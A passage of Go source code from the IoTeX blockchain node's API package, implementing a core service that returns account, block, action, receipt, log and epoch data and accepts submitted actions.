// Copyright (c) 2019 IoTeX Foundation // This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no // warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent // permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache // License 2.0 that can be found in the LICENSE file. package api import ( "bytes" "context" "encoding/hex" "fmt" "math" "math/big" "strconv" "time" "github.com/golang/protobuf/ptypes" "github.com/pkg/errors" "go.uber.org/zap" "google.golang.org/genproto/googleapis/rpc/errdetails" "google.golang.org/grpc/codes" "google.golang.org/grpc/status" "google.golang.org/protobuf/proto" "github.com/iotexproject/go-pkgs/hash" "github.com/iotexproject/iotex-address/address" "github.com/iotexproject/iotex-election/committee" "github.com/iotexproject/iotex-proto/golang/iotexapi" "github.com/iotexproject/iotex-proto/golang/iotextypes" "github.com/iotexproject/iotex-core/action" "github.com/iotexproject/iotex-core/action/protocol" accountutil "github.com/iotexproject/iotex-core/action/protocol/account/util" "github.com/iotexproject/iotex-core/action/protocol/execution/evm" "github.com/iotexproject/iotex-core/action/protocol/poll" "github.com/iotexproject/iotex-core/action/protocol/rolldpos" "github.com/iotexproject/iotex-core/actpool" logfilter "github.com/iotexproject/iotex-core/api/logfilter" "github.com/iotexproject/iotex-core/blockchain" "github.com/iotexproject/iotex-core/blockchain/block" "github.com/iotexproject/iotex-core/blockchain/blockdao" "github.com/iotexproject/iotex-core/blockchain/filedao" "github.com/iotexproject/iotex-core/blockchain/genesis" "github.com/iotexproject/iotex-core/blockindex" "github.com/iotexproject/iotex-core/blocksync" "github.com/iotexproject/iotex-core/config" "github.com/iotexproject/iotex-core/db" "github.com/iotexproject/iotex-core/gasstation" "github.com/iotexproject/iotex-core/pkg/log" "github.com/iotexproject/iotex-core/pkg/tracer" "github.com/iotexproject/iotex-core/pkg/version" "github.com/iotexproject/iotex-core/state" "github.com/iotexproject/iotex-core/state/factory" ) // coreService provides api for user to interact with blockchain data type coreService struct { bc blockchain.Blockchain bs blocksync.BlockSync sf factory.Factory dao blockdao.BlockDAO indexer blockindex.Indexer bfIndexer blockindex.BloomFilterIndexer ap actpool.ActPool gs *gasstation.GasStation broadcastHandler BroadcastOutbound cfg config.Config registry *protocol.Registry chainListener Listener hasActionIndex bool electionCommittee committee.Committee readCache *ReadCache } // newcoreService creates a api server that contains major blockchain components func newCoreService( cfg config.Config, chain blockchain.Blockchain, bs blocksync.BlockSync, sf factory.Factory, dao blockdao.BlockDAO, indexer blockindex.Indexer, bfIndexer blockindex.BloomFilterIndexer, actPool actpool.ActPool, registry *protocol.Registry, opts ...Option, ) (*coreService, error) { apiCfg := Config{} for _, opt := range opts { if err := opt(&apiCfg); err != nil { return nil, err } } if cfg.API == (config.API{}) { log.L().Warn("API server is not configured.") cfg.API = config.Default.API } if cfg.API.RangeQueryLimit < uint64(cfg.API.TpsWindow) { return nil, errors.New("range query upper limit cannot be less than tps window") } svr := &coreService{ bc: chain, bs: bs, sf: sf, dao: dao, indexer: indexer, bfIndexer: bfIndexer, ap: actPool, broadcastHandler: apiCfg.broadcastHandler, cfg: cfg, registry: registry, chainListener: NewChainListener(500), gs: gasstation.NewGasStation(chain, sf.SimulateExecution, dao, cfg.API), electionCommittee: apiCfg.electionCommittee, readCache: NewReadCache(), } if _, ok := cfg.Plugins[config.GatewayPlugin]; ok { svr.hasActionIndex = true } return svr, nil } // Account returns the metadata of an account func (core *coreService) Account(addr address.Address) (*iotextypes.AccountMeta, *iotextypes.BlockIdentifier, error) { addrStr := addr.String() if addrStr == address.RewardingPoolAddr || addrStr == address.StakingBucketPoolAddr { return core.getProtocolAccount(context.Background(), addrStr) } state, tipHeight, err := accountutil.AccountStateWithHeight(core.sf, addr) if err != nil { return nil, nil, status.Error(codes.NotFound, err.Error()) } pendingNonce, err := core.ap.GetPendingNonce(addrStr) if err != nil { return nil, nil, status.Error(codes.Internal, err.Error()) } if core.indexer == nil { return nil, nil, status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error()) } numActions, err := core.indexer.GetActionCountByAddress(hash.BytesToHash160(addr.Bytes())) if err != nil { return nil, nil, status.Error(codes.NotFound, err.Error()) } accountMeta := &iotextypes.AccountMeta{ Address: addrStr, Balance: state.Balance.String(), Nonce: state.Nonce, PendingNonce: pendingNonce, NumActions: numActions, IsContract: state.IsContract(), } if state.IsContract() { var code evm.SerializableBytes _, err = core.sf.State(&code, protocol.NamespaceOption(evm.CodeKVNameSpace), protocol.KeyOption(state.CodeHash)) if err != nil { return nil, nil, status.Error(codes.NotFound, err.Error()) } accountMeta.ContractByteCode = code } header, err := core.bc.BlockHeaderByHeight(tipHeight) if err != nil { return nil, nil, status.Error(codes.NotFound, err.Error()) } hash := header.HashBlock() return accountMeta, &iotextypes.BlockIdentifier{ Hash: hex.EncodeToString(hash[:]), Height: tipHeight, }, nil } // ChainMeta returns blockchain metadata func (core *coreService) ChainMeta() (*iotextypes.ChainMeta, string, error) { tipHeight := core.bc.TipHeight() if tipHeight == 0 { return &iotextypes.ChainMeta{ Epoch: &iotextypes.EpochData{}, ChainID: core.bc.ChainID(), }, "", nil } syncStatus := "" if core.bs != nil { syncStatus = core.bs.SyncStatus() } chainMeta := &iotextypes.ChainMeta{ Height: tipHeight, ChainID: core.bc.ChainID(), } if core.indexer == nil { return chainMeta, syncStatus, nil } totalActions, err := core.indexer.GetTotalActions() if err != nil { return nil, "", status.Error(codes.Internal, err.Error()) } blockLimit := int64(core.cfg.API.TpsWindow) if blockLimit <= 0 { return nil, "", status.Errorf(codes.Internal, "block limit is %d", blockLimit) } // avoid genesis block if int64(tipHeight) < blockLimit { blockLimit = int64(tipHeight) } blks, err := core.BlockMetas(tipHeight-uint64(blockLimit)+1, uint64(blockLimit)) if err != nil { return nil, "", status.Error(codes.NotFound, err.Error()) } if len(blks) == 0 { return nil, "", status.Error(codes.NotFound, "get 0 blocks! not able to calculate aps") } var numActions int64 for _, blk := range blks { numActions += blk.NumActions } t1 := time.Unix(blks[0].Timestamp.GetSeconds(), int64(blks[0].Timestamp.GetNanos())) t2 := time.Unix(blks[len(blks)-1].Timestamp.GetSeconds(), int64(blks[len(blks)-1].Timestamp.GetNanos())) // duration of time difference in milli-seconds // TODO: use config.Genesis.BlockInterval after PR1289 merges timeDiff := (t2.Sub(t1) + 10*time.Second) / time.Millisecond tps := float32(numActions*1000) / float32(timeDiff) chainMeta.NumActions = int64(totalActions) chainMeta.Tps = int64(math.Ceil(float64(tps))) chainMeta.TpsFloat = tps rp := rolldpos.FindProtocol(core.registry) if rp != nil { epochNum := rp.GetEpochNum(tipHeight) epochHeight := rp.GetEpochHeight(epochNum) gravityChainStartHeight, err := core.getGravityChainStartHeight(epochHeight) if err != nil { return nil, "", status.Error(codes.NotFound, err.Error()) } chainMeta.Epoch = &iotextypes.EpochData{ Num: epochNum, Height: epochHeight, GravityChainStartHeight: gravityChainStartHeight, } } return chainMeta, syncStatus, nil } // ServerMeta gets the server metadata func (core *coreService) ServerMeta() (packageVersion string, packageCommitID string, gitStatus string, goVersion string, buildTime string) { packageVersion = version.PackageVersion packageCommitID = version.PackageCommitID gitStatus = version.GitStatus goVersion = version.GoVersion buildTime = version.BuildTime return } // SendAction is the API to send an action to blockchain. func (core *coreService) SendAction(ctx context.Context, in *iotextypes.Action) (string, error) { log.L().Debug("receive send action request") var selp action.SealedEnvelope if err := selp.LoadProto(in); err != nil { return "", status.Error(codes.InvalidArgument, err.Error()) } // reject action if chainID is not matched at KamchatkaHeight if core.cfg.Genesis.Blockchain.IsToBeEnabled(core.bc.TipHeight()) { if core.bc.ChainID() != in.GetCore().GetChainID() { return "", status.Errorf(codes.InvalidArgument, "ChainID does not match, expecting %d, got %d", core.bc.ChainID(), in.GetCore().GetChainID()) } } // Add to local actpool ctx = protocol.WithRegistry(ctx, core.registry) hash, err := selp.Hash() if err != nil { return "", err } l := log.L().With(zap.String("actionHash", hex.EncodeToString(hash[:]))) if err = core.ap.Add(ctx, selp); err != nil { txBytes, serErr := proto.Marshal(in) if serErr != nil { l.Error("Data corruption", zap.Error(serErr)) } else { l.With(zap.String("txBytes", hex.EncodeToString(txBytes))).Error("Failed to accept action", zap.Error(err)) } errMsg := core.cfg.ProducerAddress().String() + ": " + err.Error() st := status.New(codes.Internal, errMsg) br := &errdetails.BadRequest{ FieldViolations: []*errdetails.BadRequest_FieldViolation{ { Field: "Action rejected", Description: action.LoadErrorDescription(err), }, }, } st, err := st.WithDetails(br) if err != nil { log.S().Panicf("Unexpected error attaching metadata: %v", err) } return "", st.Err() } // If there is no error putting into local actpool, // Broadcast it to the network if err = core.broadcastHandler(ctx, core.bc.ChainID(), in); err != nil { l.Warn("Failed to broadcast SendAction request.", zap.Error(err)) } return hex.EncodeToString(hash[:]), nil } // ReceiptByAction gets receipt with corresponding action hash func (core *coreService) ReceiptByAction(actHash hash.Hash256) (*action.Receipt, string, error) { if !core.hasActionIndex || core.indexer == nil { return nil, "", status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error()) } receipt, err := core.ReceiptByActionHash(actHash) if err != nil { return nil, "", status.Error(codes.NotFound, err.Error()) } blkHash, err := core.getBlockHashByActionHash(actHash) if err != nil { return nil, "", status.Error(codes.NotFound, err.Error()) } return receipt, hex.EncodeToString(blkHash[:]), nil } // ReadContract reads the state in a contract address specified by the slot func (core *coreService) ReadContract(ctx context.Context, in *iotextypes.Execution, callerAddr address.Address, gasLimit uint64) (string, *iotextypes.Receipt, error) { log.L().Debug("receive read smart contract request") sc := &action.Execution{} if err := sc.LoadProto(in); err != nil { return "", nil, status.Error(codes.InvalidArgument, err.Error()) } key := hash.Hash160b(append([]byte(sc.Contract()), sc.Data()...)) // TODO: either moving readcache into the upper layer or change the storage format if d, ok := core.readCache.Get(key); ok { res := iotexapi.ReadContractResponse{} if err := proto.Unmarshal(d, &res); err == nil { return res.Data, res.Receipt, nil } } state, err := accountutil.AccountState(core.sf, callerAddr) if err != nil { return "", nil, status.Error(codes.InvalidArgument, err.Error()) } if ctx, err = core.bc.Context(ctx); err != nil { return "", nil, err } if gasLimit == 0 || core.cfg.Genesis.BlockGasLimit < gasLimit { gasLimit = core.cfg.Genesis.BlockGasLimit } sc, _ = action.NewExecution( sc.Contract(), state.Nonce+1, sc.Amount(), gasLimit, big.NewInt(0), // ReadContract() is read-only, use 0 to prevent insufficient gas sc.Data(), ) retval, receipt, err := core.sf.SimulateExecution(ctx, callerAddr, sc, core.dao.GetBlockHash) if err != nil { return "", nil, status.Error(codes.Internal, err.Error()) } // ReadContract() is read-only, if no error returned, we consider it a success receipt.Status = uint64(iotextypes.ReceiptStatus_Success) res := iotexapi.ReadContractResponse{ Data: hex.EncodeToString(retval), Receipt: receipt.ConvertToReceiptPb(), } if d, err := proto.Marshal(&res); err == nil { core.readCache.Put(key, d) } return res.Data, res.Receipt, nil } // ReadState reads state on blockchain func (core *coreService) ReadState(protocolID string, height string, methodName []byte, arguments [][]byte) (*iotexapi.ReadStateResponse, error) { p, ok := core.registry.Find(protocolID) if !ok { return nil, status.Errorf(codes.Internal, "protocol %s isn't registered", protocolID) } data, readStateHeight, err := core.readState(context.Background(), p, height, methodName, arguments...) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } blkHash, err := core.dao.GetBlockHash(readStateHeight) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, status.Error(codes.NotFound, err.Error()) } return nil, status.Error(codes.Internal, err.Error()) } return &iotexapi.ReadStateResponse{ Data: data, BlockIdentifier: &iotextypes.BlockIdentifier{ Height: readStateHeight, Hash: hex.EncodeToString(blkHash[:]), }, }, nil } // SuggestGasPrice suggests gas price func (core *coreService) SuggestGasPrice() (uint64, error) { return core.gs.SuggestGasPrice() } // EstimateGasForAction estimates gas for action func (core *coreService) EstimateGasForAction(in *iotextypes.Action) (uint64, error) { estimateGas, err := core.gs.EstimateGasForAction(in) if err != nil { return 0, status.Error(codes.Internal, err.Error()) } return estimateGas, nil } // EstimateActionGasConsumption estimate gas consume for action without signature func (core *coreService) EstimateActionGasConsumption(ctx context.Context, in *iotexapi.EstimateActionGasConsumptionRequest) (uint64, error) { var ret uint64 // TODO: refactor gas estimation code out of core service switch { case in.GetExecution() != nil: request := in.GetExecution() return core.estimateActionGasConsumptionForExecution(ctx, request, in.GetCallerAddress()) case in.GetTransfer() != nil: ret = uint64(len(in.GetTransfer().Payload))*action.TransferPayloadGas + action.TransferBaseIntrinsicGas case in.GetStakeCreate() != nil: ret = uint64(len(in.GetStakeCreate().Payload))*action.CreateStakePayloadGas + action.CreateStakeBaseIntrinsicGas case in.GetStakeUnstake() != nil: ret = uint64(len(in.GetStakeUnstake().Payload))*action.ReclaimStakePayloadGas + action.ReclaimStakeBaseIntrinsicGas case in.GetStakeWithdraw() != nil: ret = uint64(len(in.GetStakeWithdraw().Payload))*action.ReclaimStakePayloadGas + action.ReclaimStakeBaseIntrinsicGas case in.GetStakeAddDeposit() != nil: ret = uint64(len(in.GetStakeAddDeposit().Payload))*action.DepositToStakePayloadGas + action.DepositToStakeBaseIntrinsicGas case in.GetStakeRestake() != nil: ret = uint64(len(in.GetStakeRestake().Payload))*action.RestakePayloadGas + action.RestakeBaseIntrinsicGas case in.GetStakeChangeCandidate() != nil: ret = uint64(len(in.GetStakeChangeCandidate().Payload))*action.MoveStakePayloadGas + action.MoveStakeBaseIntrinsicGas case in.GetStakeTransferOwnership() != nil: ret = uint64(len(in.GetStakeTransferOwnership().Payload))*action.MoveStakePayloadGas + action.MoveStakeBaseIntrinsicGas case in.GetCandidateRegister() != nil: ret = uint64(len(in.GetCandidateRegister().Payload))*action.CandidateRegisterPayloadGas + action.CandidateRegisterBaseIntrinsicGas case in.GetCandidateUpdate() != nil: ret = action.CandidateUpdateBaseIntrinsicGas default: return 0, status.Error(codes.InvalidArgument, "invalid argument") } return ret, nil } // EpochMeta gets epoch metadata func (core *coreService) EpochMeta(epochNum uint64) (*iotextypes.EpochData, uint64, []*iotexapi.BlockProducerInfo, error) { rp := rolldpos.FindProtocol(core.registry) if rp == nil { return nil, 0, nil, nil } if epochNum < 1 { return nil, 0, nil, status.Error(codes.InvalidArgument, "epoch number cannot be less than one") } epochHeight := rp.GetEpochHeight(epochNum) gravityChainStartHeight, err := core.getGravityChainStartHeight(epochHeight) if err != nil { return nil, 0, nil, status.Error(codes.NotFound, err.Error()) } epochData := &iotextypes.EpochData{ Num: epochNum, Height: epochHeight, GravityChainStartHeight: gravityChainStartHeight, } pp := poll.FindProtocol(core.registry) if pp == nil { return nil, 0, nil, status.Error(codes.Internal, "poll protocol is not registered") } methodName := []byte("ActiveBlockProducersByEpoch") arguments := [][]byte{[]byte(strconv.FormatUint(epochNum, 10))} height := strconv.FormatUint(epochHeight, 10) data, _, err := core.readState(context.Background(), pp, height, methodName, arguments...) if err != nil { return nil, 0, nil, status.Error(codes.NotFound, err.Error()) } var activeConsensusBlockProducers state.CandidateList if err := activeConsensusBlockProducers.Deserialize(data); err != nil { return nil, 0, nil, status.Error(codes.Internal, err.Error()) } numBlks, produce, err := core.getProductivityByEpoch(rp, epochNum, core.bc.TipHeight(), activeConsensusBlockProducers) if err != nil { return nil, 0, nil, status.Error(codes.NotFound, err.Error()) } methodName = []byte("BlockProducersByEpoch") data, _, err = core.readState(context.Background(), pp, height, methodName, arguments...) if err != nil { return nil, 0, nil, status.Error(codes.NotFound, err.Error()) } var BlockProducers state.CandidateList if err := BlockProducers.Deserialize(data); err != nil { return nil, 0, nil, status.Error(codes.Internal, err.Error()) } var blockProducersInfo []*iotexapi.BlockProducerInfo for _, bp := range BlockProducers { var active bool var blockProduction uint64 if production, ok := produce[bp.Address]; ok { active = true blockProduction = production } blockProducersInfo = append(blockProducersInfo, &iotexapi.BlockProducerInfo{ Address: bp.Address, Votes: bp.Votes.String(), Active: active, Production: blockProduction, }) } return epochData, numBlks, blockProducersInfo, nil } // RawBlocks gets raw block data func (core *coreService) RawBlocks(startHeight uint64, count uint64, withReceipts bool, withTransactionLogs bool) ([]*iotexapi.BlockInfo, error) { if count == 0 || count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } tipHeight := core.bc.TipHeight() if startHeight > tipHeight { return nil, status.Error(codes.InvalidArgument, "start height should not exceed tip height") } endHeight := startHeight + count - 1 if endHeight > tipHeight { endHeight = tipHeight } var res []*iotexapi.BlockInfo for height := startHeight; height <= endHeight; height++ { blk, err := core.dao.GetBlockByHeight(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } var receiptsPb []*iotextypes.Receipt if withReceipts && height > 0 { receipts, err := core.dao.GetReceipts(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } for _, receipt := range receipts { receiptsPb = append(receiptsPb, receipt.ConvertToReceiptPb()) } } var transactionLogs *iotextypes.TransactionLogs if withTransactionLogs { if transactionLogs, err = core.dao.TransactionLogs(height); err != nil { return nil, status.Error(codes.NotFound, err.Error()) } } res = append(res, &iotexapi.BlockInfo{ Block: blk.ConvertToBlockPb(), Receipts: receiptsPb, TransactionLogs: transactionLogs, }) } return res, nil } // Logs get logs filtered by contract address and topics func (core *coreService) Logs(in *iotexapi.GetLogsRequest) ([]*iotextypes.Log, error) { if in.GetFilter() == nil { return nil, status.Error(codes.InvalidArgument, "empty filter") } var ( logs []*iotextypes.Log err error ) switch { case in.GetByBlock() != nil: req := in.GetByBlock() startBlock, err := core.dao.GetBlockHeight(hash.BytesToHash256(req.BlockHash)) if err != nil { return nil, status.Error(codes.InvalidArgument, "invalid block hash") } logs, err = core.getLogsInBlock(logfilter.NewLogFilter(in.GetFilter(), nil, nil), startBlock) if err != nil { return nil, err } case in.GetByRange() != nil: req := in.GetByRange() startBlock := req.GetFromBlock() if startBlock > core.bc.TipHeight() { return nil, status.Error(codes.InvalidArgument, "start block > tip height") } endBlock := req.GetToBlock() if endBlock > core.bc.TipHeight() || endBlock == 0 { endBlock = core.bc.TipHeight() } paginationSize := req.GetPaginationSize() if paginationSize == 0 { paginationSize = 1000 } if paginationSize > 5000 { paginationSize = 5000 } logs, err = core.getLogsInRange(logfilter.NewLogFilter(in.GetFilter(), nil, nil), startBlock, endBlock, paginationSize) default: return nil, status.Error(codes.InvalidArgument, "invalid GetLogsRequest type") } return logs, err } // StreamBlocks streams blocks func (core *coreService) StreamBlocks(stream iotexapi.APIService_StreamBlocksServer) error { errChan := make(chan error) if err := core.chainListener.AddResponder(NewBlockListener(stream, errChan)); err != nil { return status.Error(codes.Internal, err.Error()) } for { select { case err := <-errChan: if err != nil { err = status.Error(codes.Aborted, err.Error()) } return err } } } // StreamLogs streams logs that match the filter condition func (core *coreService) StreamLogs(in *iotexapi.LogsFilter, stream iotexapi.APIService_StreamLogsServer) error { if in == nil { return status.Error(codes.InvalidArgument, "empty filter") } errChan := make(chan error) // register the log filter so it will match logs in new blocks if err := core.chainListener.AddResponder(logfilter.NewLogFilter(in, stream, errChan)); err != nil { return status.Error(codes.Internal, err.Error()) } for { select { case err := <-errChan: if err != nil { err = status.Error(codes.Aborted, err.Error()) } return err } } } // ElectionBuckets returns the native election buckets. func (core *coreService) ElectionBuckets(epochNum uint64) ([]*iotextypes.ElectionBucket, error) { if core.electionCommittee == nil { return nil, status.Error(codes.Unavailable, "Native election no supported") } buckets, err := core.electionCommittee.NativeBucketsByEpoch(epochNum) if err != nil { return nil, status.Error(codes.Internal, err.Error()) } re := make([]*iotextypes.ElectionBucket, len(buckets)) for i, b := range buckets { startTime, err := ptypes.TimestampProto(b.StartTime()) if err != nil { return nil, status.Error(codes.Internal, err.Error()) } re[i] = &iotextypes.ElectionBucket{ Voter: b.Voter(), Candidate: b.Candidate(), Amount: b.Amount().Bytes(), StartTime: startTime, Duration: ptypes.DurationProto(b.Duration()), Decay: b.Decay(), } } return re, nil } // ReceiptByActionHash returns receipt by action hash func (core *coreService) ReceiptByActionHash(h hash.Hash256) (*action.Receipt, error) { if !core.hasActionIndex || core.indexer == nil { return nil, status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error()) } actIndex, err := core.indexer.GetActionIndex(h[:]) if err != nil { return nil, err } return core.dao.GetReceiptByActionHash(h, actIndex.BlockHeight()) } // TransactionLogByActionHash returns transaction log by action hash func (core *coreService) TransactionLogByActionHash(actHash string) (*iotextypes.TransactionLog, error) { if !core.hasActionIndex || core.indexer == nil { return nil, status.Error(codes.Unimplemented, blockindex.ErrActionIndexNA.Error()) } if !core.dao.ContainsTransactionLog() { return nil, status.Error(codes.Unimplemented, filedao.ErrNotSupported.Error()) } h, err := hex.DecodeString(actHash) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } actIndex, err := core.indexer.GetActionIndex(h) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, status.Error(codes.NotFound, err.Error()) } return nil, status.Error(codes.Internal, err.Error()) } sysLog, err := core.dao.TransactionLogs(actIndex.BlockHeight()) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, status.Error(codes.NotFound, err.Error()) } return nil, status.Error(codes.Internal, err.Error()) } for _, log := range sysLog.Logs { if bytes.Equal(h, log.ActionHash) { return log, nil } } return nil, status.Errorf(codes.NotFound, "transaction log not found for action %s", actHash) } // TransactionLogByBlockHeight returns transaction log by block height func (core *coreService) TransactionLogByBlockHeight(blockHeight uint64) (*iotextypes.BlockIdentifier, *iotextypes.TransactionLogs, error) { if !core.dao.ContainsTransactionLog() { return nil, nil, status.Error(codes.Unimplemented, filedao.ErrNotSupported.Error()) } tip, err := core.dao.Height() if err != nil { return nil, nil, status.Error(codes.Internal, err.Error()) } if blockHeight < 1 || blockHeight > tip { return nil, nil, status.Errorf(codes.InvalidArgument, "invalid block height = %d", blockHeight) } h, err := core.dao.GetBlockHash(blockHeight) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, nil, status.Error(codes.NotFound, err.Error()) } return nil, nil, status.Error(codes.Internal, err.Error()) } blockIdentifier := &iotextypes.BlockIdentifier{ Hash: hex.EncodeToString(h[:]), Height: blockHeight, } sysLog, err := core.dao.TransactionLogs(blockHeight) if err != nil { if errors.Cause(err) == db.ErrNotExist { // should return empty, no transaction happened in block return blockIdentifier, nil, nil } return nil, nil, status.Error(codes.Internal, err.Error()) } return blockIdentifier, sysLog, nil } // Start starts the API server func (core *coreService) Start() error { if err := core.bc.AddSubscriber(core.readCache); err != nil { return errors.Wrap(err, "failed to add readCache") } if err := core.bc.AddSubscriber(core.chainListener); err != nil { return errors.Wrap(err, "failed to add chainListener") } if err := core.chainListener.Start(); err != nil { return errors.Wrap(err, "failed to start blockchain listener") } return nil } // Stop stops the API server func (core *coreService) Stop() error { return core.chainListener.Stop() } func (core *coreService) readState(ctx context.Context, p protocol.Protocol, height string, methodName []byte, arguments ...[]byte) ([]byte, uint64, error) { key := ReadKey{ Name: p.Name(), Height: height, Method: methodName, Args: arguments, } if d, ok := core.readCache.Get(key.Hash()); ok { var h uint64 if height != "" { h, _ = strconv.ParseUint(height, 0, 64) } return d, h, nil } // TODO: need to complete the context tipHeight := core.bc.TipHeight() ctx = protocol.WithBlockCtx(ctx, protocol.BlockCtx{ BlockHeight: tipHeight, }) ctx = genesis.WithGenesisContext( protocol.WithRegistry(ctx, core.registry), core.cfg.Genesis, ) ctx = protocol.WithFeatureCtx(protocol.WithFeatureWithHeightCtx(ctx)) rp := rolldpos.FindProtocol(core.registry) if rp == nil { return nil, uint64(0), errors.New("rolldpos is not registered") } tipEpochNum := rp.GetEpochNum(tipHeight) if height != "" { inputHeight, err := strconv.ParseUint(height, 0, 64) if err != nil { return nil, uint64(0), err } inputEpochNum := rp.GetEpochNum(inputHeight) if inputEpochNum < tipEpochNum { // old data, wrap to history state reader d, h, err := p.ReadState(ctx, factory.NewHistoryStateReader(core.sf, rp.GetEpochHeight(inputEpochNum)), methodName, arguments...) if err == nil { core.readCache.Put(key.Hash(), d) } return d, h, err } } // TODO: need to distinguish user error and system error d, h, err := p.ReadState(ctx, core.sf, methodName, arguments...) if err == nil { core.readCache.Put(key.Hash(), d) } return d, h, err } func (core *coreService) getActionsFromIndex(totalActions, start, count uint64) ([]*iotexapi.ActionInfo, error) { hashes, err := core.indexer.GetActionHashFromIndex(start, count) if err != nil { return nil, status.Error(codes.Unavailable, err.Error()) } var actionInfo []*iotexapi.ActionInfo for i := range hashes { act, err := core.getAction(hash.BytesToHash256(hashes[i]), false) if err != nil { return nil, status.Error(codes.Unavailable, err.Error()) } actionInfo = append(actionInfo, act) } return actionInfo, nil } // Actions returns actions within the range func (core *coreService) Actions(start uint64, count uint64) ([]*iotexapi.ActionInfo, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } totalActions, err := core.indexer.GetTotalActions() if err != nil { return nil, status.Error(codes.Internal, err.Error()) } if start >= totalActions { return nil, status.Error(codes.InvalidArgument, "start exceeds the total actions in the block") } if totalActions == uint64(0) || count == 0 { return []*iotexapi.ActionInfo{}, nil } if start+count > totalActions { count = totalActions - start } if core.hasActionIndex { return core.getActionsFromIndex(totalActions, start, count) } // Finding actions in reverse order saves time for querying most recent actions reverseStart := totalActions - (start + count) if totalActions < start+count { reverseStart = uint64(0) count = totalActions - start } var res []*iotexapi.ActionInfo var hit bool for height := core.bc.TipHeight(); height >= 1 && count > 0; height-- { blk, err := core.dao.GetBlockByHeight(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } if !hit && reverseStart >= uint64(len(blk.Actions)) { reverseStart -= uint64(len(blk.Actions)) continue } // now reverseStart < len(blk.Actions), we are going to fetch actions from this block hit = true act := core.reverseActionsInBlock(blk, reverseStart, count) res = append(act, res...) count -= uint64(len(act)) reverseStart = 0 } return res, nil } // Action returns action by action hash func (core *coreService) Action(actionHash string, checkPending bool) (*iotexapi.ActionInfo, error) { actHash, err := hash.HexStringToHash256(actionHash) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } act, err := core.getAction(actHash, checkPending) if err != nil { return nil, status.Error(codes.Unavailable, err.Error()) } return act, nil } // ActionsByAddress returns all actions associated with an address func (core *coreService) ActionsByAddress(addr address.Address, start uint64, count uint64) ([]*iotexapi.ActionInfo, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } actions, err := core.indexer.GetActionsByAddress(hash.BytesToHash160(addr.Bytes()), start, count) if err != nil { if errors.Cause(err) == db.ErrBucketNotExist || errors.Cause(err) == db.ErrNotExist { // no actions associated with address, return nil return nil, nil } return nil, status.Error(codes.NotFound, err.Error()) } var res []*iotexapi.ActionInfo for i := range actions { act, err := core.getAction(hash.BytesToHash256(actions[i]), false) if err != nil { continue } res = append(res, act) } return res, nil } // getBlockHashByActionHash returns block hash by action hash func (core *coreService) getBlockHashByActionHash(h hash.Hash256) (hash.Hash256, error) { actIndex, err := core.indexer.GetActionIndex(h[:]) if err != nil { return hash.ZeroHash256, err } return core.dao.GetBlockHash(actIndex.BlockHeight()) } // getActionByActionHash returns action by action hash func (core *coreService) getActionByActionHash(h hash.Hash256) (action.SealedEnvelope, hash.Hash256, uint64, uint32, error) { actIndex, err := core.indexer.GetActionIndex(h[:]) if err != nil { return action.SealedEnvelope{}, hash.ZeroHash256, 0, 0, err } blk, err := core.dao.GetBlockByHeight(actIndex.BlockHeight()) if err != nil { return action.SealedEnvelope{}, hash.ZeroHash256, 0, 0, err } selp, index, err := core.dao.GetActionByActionHash(h, actIndex.BlockHeight()) return selp, blk.HashBlock(), actIndex.BlockHeight(), index, err } // UnconfirmedActionsByAddress returns all unconfirmed actions in actpool associated with an address func (core *coreService) UnconfirmedActionsByAddress(address string, start uint64, count uint64) ([]*iotexapi.ActionInfo, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } selps := core.ap.GetUnconfirmedActs(address) if len(selps) == 0 { return []*iotexapi.ActionInfo{}, nil } if start >= uint64(len(selps)) { return nil, status.Error(codes.InvalidArgument, "start exceeds the limit") } var res []*iotexapi.ActionInfo for i := start; i < uint64(len(selps)) && i < start+count; i++ { if act, err := core.pendingAction(selps[i]); err == nil { res = append(res, act) } } return res, nil } // ActionsByBlock returns all actions in a block func (core *coreService) ActionsByBlock(blkHash string, start uint64, count uint64) ([]*iotexapi.ActionInfo, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit && count != math.MaxUint64 { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } hash, err := hash.HexStringToHash256(blkHash) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } blk, err := core.dao.GetBlock(hash) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } if start >= uint64(len(blk.Actions)) { return nil, status.Error(codes.InvalidArgument, "start exceeds the limit") } return core.actionsInBlock(blk, start, count), nil } // BlockMetas returns blockmetas response within the height range func (core *coreService) BlockMetas(start uint64, count uint64) ([]*iotextypes.BlockMeta, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } var ( tipHeight = core.bc.TipHeight() res = make([]*iotextypes.BlockMeta, 0) ) if start > tipHeight { return nil, status.Error(codes.InvalidArgument, "start height should not exceed tip height") } for height := start; height <= tipHeight && count > 0; height++ { blockMeta, err := core.getBlockMetaByHeight(height) if err != nil { return nil, err } res = append(res, blockMeta) count-- } return res, nil } // 